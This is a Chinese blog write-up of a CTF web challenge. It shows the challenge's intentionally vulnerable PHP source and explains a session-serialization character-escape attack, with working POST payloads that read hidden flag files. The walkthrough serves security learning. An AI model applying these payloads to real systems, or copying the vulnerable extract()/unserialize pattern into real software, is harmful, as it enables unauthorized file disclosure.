[安洵杯 2019]easy_serialize_php 1

最新推荐文章于 2023-08-12 00:40:14 发布

南冥~

最新推荐文章于 2023-08-12 00:40:14 发布

阅读量537

点赞数

文章标签： php web安全安全

本文链接：https://blog.csdn.net/plant1234/article/details/125115481

版权

[安洵杯 2019]easy_serialize_php 1

首先打开题目根据提示得到源码：

在这里插入图片描述

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

对代码进行审计
发现我们能利用的点就是：

在这里插入图片描述
这文件读取，但我们要读什么呢？

根据提示看一下phpinfo

在这里插入图片描述

发现可以读取的文件：
在这里插入图片描述
回到源码

继续审计，要利用文件读取必修绕过

在这里插入图片描述

这个是在extract()对数组赋值之后进行的赋值
我们传入$_SESSION数组可以覆盖前面的值
但是不能覆盖这里img的值

发现有过滤字符替换为空：
在这里插入图片描述

可以利用字符逃逸
首先构造数组反序列化：

在这里插入图片描述

可以看到，我们要把function的值溢出来作为数组的值，
就可以通过user的值的长度来把：";s:8:“function”;s:73:
作为user的值，然后把后面的：
s:8:“function”;s:10:“show_image”;s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}

做为新的值，

也就是user的值的长度要等于";s:8:“function”;s:73:的长度22个字符

还是能被替换为空的字符也就是：4个flag加2个php
刚好22位：flagflagflagflagphpphp

在这里插入图片描述

看见刚好22位

加上过滤函数试试：

发现字符：";s:8:“function”;s:73:

被做为user的值,function的值逃逸做为数组的值

在这里插入图片描述

这样在";}后面的字符不会被作为反序列化的字符
就会把之前img的值抛弃

读取d0g3_f1ag.php的值：

playload:

GET:

?f=show_image

POST:

_SESSION[user]=flagflagflagflagphpphp&_SESSION[function]=;s:8:"function";s:10:"show_image";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

请求查看源码

得到：

在这里插入图片描述

根据同样的原理读取d0g3_fllllllag

playload:

GET:

?f=show_image

POST:

_SESSION[user]=flagflagflagflagphpphp&_SESSION[function]=;s:8:"function";s:10:"show_image";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

得到flag:

在这里插入图片描述

参考博客：

https://blog.csdn.net/qq_53460654/article/details/120517086

南冥~

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
[安洵杯 2019]easy_serialize_php 1

首先打开题目根据提示得到源码：对代码进行审计发现我们能利用的点就是：这文件读取，但我们要读什么呢？根据提示看一下phpinfo发现可以读取的文件：回到源码继续审计，要利用文件读取必修绕过这个是在extract()对数组赋值之后进行的赋值我们传入$_SESSION数组可以覆盖前面的值但是不能覆盖这里img的值发现有过滤字符替换为空：可以利用字符逃逸首先构造数组反序列化：可以看到，我们要把function的值溢出来作为数组的值，就可以通过user的值的长度来把：";s:8:“function
复制链接

扫一扫